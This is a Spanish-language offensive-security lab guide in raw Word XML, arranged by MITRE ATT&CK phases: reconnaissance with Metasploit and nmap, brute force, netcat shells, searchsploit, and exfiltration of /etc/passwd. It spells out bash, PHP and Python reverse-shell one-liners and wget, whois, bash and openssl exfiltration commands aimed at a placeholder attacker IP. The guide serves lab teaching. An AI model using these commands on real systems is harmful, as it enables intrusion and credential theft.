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47E5BA" w14:textId="4C14E4B7" w:rsidR="008215D9" w:rsidRDefault="00443106" w:rsidP="00443106">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>Bloque 1: MITRE ATT&amp;CK fase 3. TA0001 Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20612C52" w14:textId="5C828167" w:rsidR="00443106" w:rsidRDefault="00443106" w:rsidP="00443106">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Ejercicio L11B1_NMAPMSF: NMap y Metasploit Framework (MSF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0860F" w14:textId="61304017" w:rsidR="00443106" w:rsidRDefault="00E73629" w:rsidP="00443106">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>argar los resultados XML de un análisis nmap que hubieras hecho anteriormente e inspeccionarlos con MSF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118CD750" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00443106">
      <w:r>
        <w:t xml:space="preserve">• Vete al directorio con los resultados del análisis en formato .xml que guardaste anteriormente </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AE6A71" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00443106">
      <w:r>
        <w:t xml:space="preserve">• Ejecuta Metaspolit Framework ejecutando estos tres comandos (ignorar advertencias) </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C951C6" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">o Inicia la base de datos de MSF: service postgresql start </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB3C10" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">o Inicia MSF: msfdb init </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D7789" w14:textId="6452F5C4" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>o Arranca la consola de MSF: msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC8DE3D" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">Ahora puedes utilizar los siguientes comandos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEED9F6" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• db_import: Importa una salida de un análisis nmap ya hecho en formato XML, actualizando los hosts conocidos en una sesión de MSF. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35507050" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• db_nmap: es el propio nmap (podemos usarlo con todos los scripts, parámetros y características que hemos visto). Si se utiliza así, los resultados de su análisis actualizan cualquier resultado de análisis anterior que tengamos (incluso cargado a través de un archivo XML), por lo que se almacenará la nueva información descubierta sobre hosts, IPs, puertos, versiones, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3C78C" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• hosts: mostrará los hosts identificados (máquinas). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C99AE0" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• hosts -c address,purpose (u otros nombres de columna): Los hosts identificados se muestran con una serie de columnas de datos. Este comando solo muestra aquellas que pueden sernos interesantes en un momento dado. • hosts -u: Mostrará sólo hosts "vivos" en el último análisis realizado. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA18E9" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• services: Mostrará todos los servicios identificados en todos los hosts escaneados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64216544" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• services -p 80: Idéntico a los anteriores, pero sólo para los puertos indicados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C1698E" w14:textId="722A8446" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t>• services -p tcp: Ídem, pero para los protocolos indicados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037CDEDB" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629"/>
    <w:p w14:paraId="4A8DD238" w14:textId="0F9AFA07" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ejercicio L11B1_DIRB: Enumerar posibles archivos ocultos con información interesante (T1190. Exploit Public-Facing Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABE3C23" w14:textId="4FBD54A7" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t>Utiliza la herramienta dirb instalada en el contenedor de ataque y este cheatsheet para localizar archivos potenciales que no están enlazados en la web, pero que pueden contener información "jugosa".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D9AC0" w14:textId="507C4FE9" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r w:rsidRPr="00E73629">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C127B61" wp14:editId="4FA95DFD">
            <wp:extent cx="2865368" cy="4351397"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1341521072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21072" name="Imagen 1" descr="Imagen que contiene Tab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70D7" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629"/>
    <w:p w14:paraId="3696BBA4" w14:textId="465B74BF" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Ejercicio L11B1_SMB: Exfiltración a través de directorios compartidos por SMB (T1190. Exploit Public-Facing Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F391599" w14:textId="77777777" w:rsidR="00E73629" w:rsidRPr="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629"/>
    <w:p w14:paraId="51D6C7FC" w14:textId="5983D3D3" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Ejercicio L11B1_CEWL: Diccionarios de contraseñas de palabras comunes contra objetivos concretos (1078. Valid Accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEBA0B1" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t>vamos a generar una lista de palabras personalizada a partir del contenido de la página web de una víctima.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73629">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843DC91" w14:textId="6418F13D" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t>puedes acceder a esta página web "víctima" en el contenedor Kali vulnerable así: http://172.116.0.3/eii/ (por favor incluye el último /).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105DF29" w14:textId="6C159E42" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r w:rsidRPr="00E73629">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14652C5C" wp14:editId="69DBDBAB">
            <wp:extent cx="4968671" cy="3703641"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="4147311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31103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57AF" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629"/>
    <w:p w14:paraId="044F75F0" w14:textId="457F9729" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Ejercicio L11B1_NMAPBRUTE: Fuerza bruta en línea con Nmap (1078. Valid Accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE70A5F" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">Con la lista de palabras generada anteriormente, usa nmap y su NSE Script Engine para encontrar scripts adecuados para atacar a través por fuerza bruta a servicios activos en la máquina vulnerable que aceptan usuarios / contraseñas. Para facilitar el trabajo, sigue estos pasos: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED3E2B" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• Examina el contenedor vulnerable para encontrar servicios, como se hizo en laboratorios anteriores. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924800C" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• Localiza los scripts NSE adecuados que utilicen técnicas de fuerza bruta contra ellos (vete al directorio /usr/share/nmap/scripts). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35A18B" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• Usa el hecho de que sabemos que un usuario válido en el sistema remoto es remotessiuser </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2987C8F0" w14:textId="77777777" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t xml:space="preserve">• Examina la documentación del script para iniciar el ataque con la lista de palabras generada contra los servicios. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30322A0C" w14:textId="67830C9D" w:rsidR="00E73629" w:rsidRDefault="00E73629" w:rsidP="00E73629">
      <w:r>
        <w:t>• Obtén la contraseña y comprueba que puedes acceder al servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A378C67" w14:textId="77777777" w:rsidR="004A4749" w:rsidRDefault="004A4749" w:rsidP="00E73629"/>
    <w:p w14:paraId="23E76C4D" w14:textId="77777777" w:rsidR="004A4749" w:rsidRDefault="004A4749" w:rsidP="00E73629"/>
    <w:p w14:paraId="40662698" w14:textId="6939EA9C" w:rsidR="004A4749" w:rsidRDefault="004A4749" w:rsidP="004A4749">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bloque 2: MITRE ATT&amp;CK fase 4. TA0002 Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA93F9B" w14:textId="2EEB1B7D" w:rsidR="004A4749" w:rsidRDefault="004A4749" w:rsidP="004A4749">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Ejercicio L11B2_NETCAT: Netcat como herramienta de escucha (TA1059. Command and Scripting Interpreter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F8629" w14:textId="2778CF4E" w:rsidR="004A4749" w:rsidRDefault="00C974AD" w:rsidP="004A4749">
      <w:r>
        <w:t>nc -lvp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;puerto&gt; pones a escuchar netcat y le envias peticiones haciendo un telnet a </w:t>
      </w:r>
      <w:r w:rsidR="00202CBA">
        <w:t>cualquier combinación &lt;ip&gt; &lt;puerto&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483B769" w14:textId="77777777" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="004A4749"/>
    <w:p w14:paraId="368E75D4" w14:textId="799B4EBD" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00202CBA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejercicio L11B2_BINDSHELL: Bind shell con netcat (TA1059. </w:t>
      </w:r>
      <w:r>
        <w:t>Command and Scripting Interpreter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B8D3D" w14:textId="152EDFB0" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:r w:rsidRPr="00202CBA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42482F11" wp14:editId="5C06895B">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="181394126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41265" name="Imagen 1" descr="Imagen que contiene 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F5CE" w14:textId="4A712B58" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:r w:rsidRPr="00202CBA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7298B6D1" wp14:editId="42597059">
            <wp:extent cx="5400040" cy="3274060"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="51197681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76810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7AEB" w14:textId="4EFE350C" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202CBA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ejercicio L11B2_REVERSESHELL: Reverse shell con netcat (TA1059. Command and Scripting Interpreter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55A395" w14:textId="7A956972" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202CBA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50FB2629" wp14:editId="2295968F">
            <wp:extent cx="5400040" cy="3182620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12562462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4627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C760" w14:textId="77777777" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E99972F" w14:textId="77777777" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74609EB6" w14:textId="77777777" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D14D6AC" w14:textId="77777777" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003681A3" w14:textId="40342625" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202CBA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ejercicio L11B2_REVERSESHELLNONC: Reverse shell sin netcat (TA1059. Command and Scripting Interpreter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A89CC1B" w14:textId="453D1B81" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202CBA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>• Bash reverse shell: bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;IP maquina atacante&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00202CBA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">/8000 0&gt;&amp;1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D21D76" w14:textId="10D865AA" w:rsidR="00202CBA" w:rsidRPr="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:r w:rsidRPr="00202CBA">
        <w:t>• PHP reverse shell: Ejecutar esto desde la línea de comandos: php -r ‘$sock=fsockopen(“</w:t>
      </w:r>
      <w:r w:rsidRPr="00202CBA">
        <w:t>&lt;I</w:t>
      </w:r>
      <w:r>
        <w:t>P maquina atacante&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00202CBA">
        <w:t xml:space="preserve">”,8000);exec(“/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048315E" w14:textId="15C96597" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:r w:rsidRPr="00202CBA">
        <w:t>• Python reverse Shell: python -c 'import socket,subprocess,os;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM);s.connect((“&lt;I</w:t>
      </w:r>
      <w:r>
        <w:t>P maquina atacante&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00202CBA">
        <w:t>”,8000)); os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call( ["/bin/sh","-i"]);’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0C1E26" w14:textId="77777777" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA"/>
    <w:p w14:paraId="7FAE9BEB" w14:textId="3A9C0F9F" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00202CBA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejercicio L11B2_SEARCHPLOIT: Searchploit (T1203. </w:t>
      </w:r>
      <w:r w:rsidRPr="00202CBA">
        <w:t>Exploitation for Client Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374545CC" w14:textId="69E194D1" w:rsidR="00202CBA" w:rsidRDefault="00202CBA" w:rsidP="00202CBA">
      <w:r>
        <w:t>localizar exploits disponibles de una vulnerabilidad conocida gracias a searchploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF8294" w14:textId="0ECFC86E" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA">
      <w:r w:rsidRPr="001E7B34">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5448DEEE" wp14:editId="4A24C0E1">
            <wp:extent cx="3977985" cy="5730737"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1434779971" name="Imagen 1" descr="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79971" name="Imagen 1" descr="Aplicación, Word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BF4F" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA">
      <w:r>
        <w:t xml:space="preserve">Para hacerlo tienes que: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFDB177" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA">
      <w:r>
        <w:t xml:space="preserve">• Identificar los servicios y sus versiones en el equipo remoto. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42901EC1" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA">
      <w:r>
        <w:t xml:space="preserve">• Buscar si hay algún servicio y versión vulnerables. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F86332" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA">
      <w:r>
        <w:t xml:space="preserve">• Buscar el EDB-ID del exploit en tú sistema local (el nombre/número de exploit). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61223E" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA">
      <w:r>
        <w:t xml:space="preserve">• Localizar dónde está el código de exploit correspondiente. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609DC68" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA">
      <w:r>
        <w:t xml:space="preserve">• Inspeccionar el código y pensar qué debes hacer para arrancarlo. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E6208" w14:textId="456B7239" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA">
      <w:r>
        <w:t>• Buscar el exploit equivalente en https://www.exploit-db.com (la versión web de esta herramienta) y ver la información que proporciona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185B9A92" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA"/>
    <w:p w14:paraId="422BE642" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="00202CBA"/>
    <w:p w14:paraId="1E49DB12" w14:textId="1DA7C3A0" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bloque 3: MITRE ATT&amp;CK fase 9-10: TA0009. Collection / TA0010. Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A242E48" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t xml:space="preserve">• Usa los comandos que te damos a continuación para exfiltrar el archivo /etc/passwd del contenedor vulnerable al contenedor de ataque. Hazte root en la máquina vulnerable para hacer estas pruebas (sudo su) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002BE1E9" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t xml:space="preserve">• La mayoría de ellos requiere un Netcat a la escucha en un puerto de la máquina atacante (nc -lvp ). Ten cuidado con el puerto que utilizas para poner nc a escuchar, ya que distintas herramientas pueden usar distintos puertos (mira cuáles en las transparencias de teoría). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD68DFB" w14:textId="791044CA" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t>• Algunos de los comandos pueden mostrar errores, pero puedes ignorarlos si los datos se filtran de todos modos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A16C11" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34"/>
    <w:p w14:paraId="0AE0CBCB" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t xml:space="preserve">Comandos para probar como fuentes de exfiltración: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB3D85" w14:textId="101FE484" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t xml:space="preserve">• Wget: wget --post-file=/etc/passwd </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;IP atacante&gt; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(el atacante escucha en el puerto 80) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F445F" w14:textId="0F3918FC" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t>• Whois: whois -h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;IP atacante&gt; -p 43 `cat /etc/passwd` (el atacante escucha en el puerto 43) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D4CF33" w14:textId="3CE1BC09" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t>• Bash: bash -c 'echo -e "POST / HTTP/0.9\n\n$(</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/etc/passwd)</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt; /dev/tcp/&lt;IPatacante&gt;/8000’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (el atacante escucha en el puerto 79) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F130D" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t xml:space="preserve">• Openssl (cuidado con este comando, el atacante debe realizar dos operaciones para exfiltrar datos correctamente): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF7997" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E7B34">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -quiet -connect </w:t>
      </w:r>
      <w:r w:rsidRPr="001E7B34">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;IP atacante&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001E7B34">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">:8000 &lt; "/etc/passwd" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E65802" w14:textId="77777777" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E7B34">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">o El atacante escribe: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223ECD74" w14:textId="5E5C91B0" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E7B34">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A1678" w14:textId="4CCAFC53" w:rsidR="001E7B34" w:rsidRPr="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E7B34">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_server -quiet -key key.pem -cert cert.pem -port 8000 &gt; passwd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC09FA6" w14:textId="7149DC52" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t>• Nc: nc -lvp 8000 &lt; fichero_privado.txt (el atacante escribe nc</w:t>
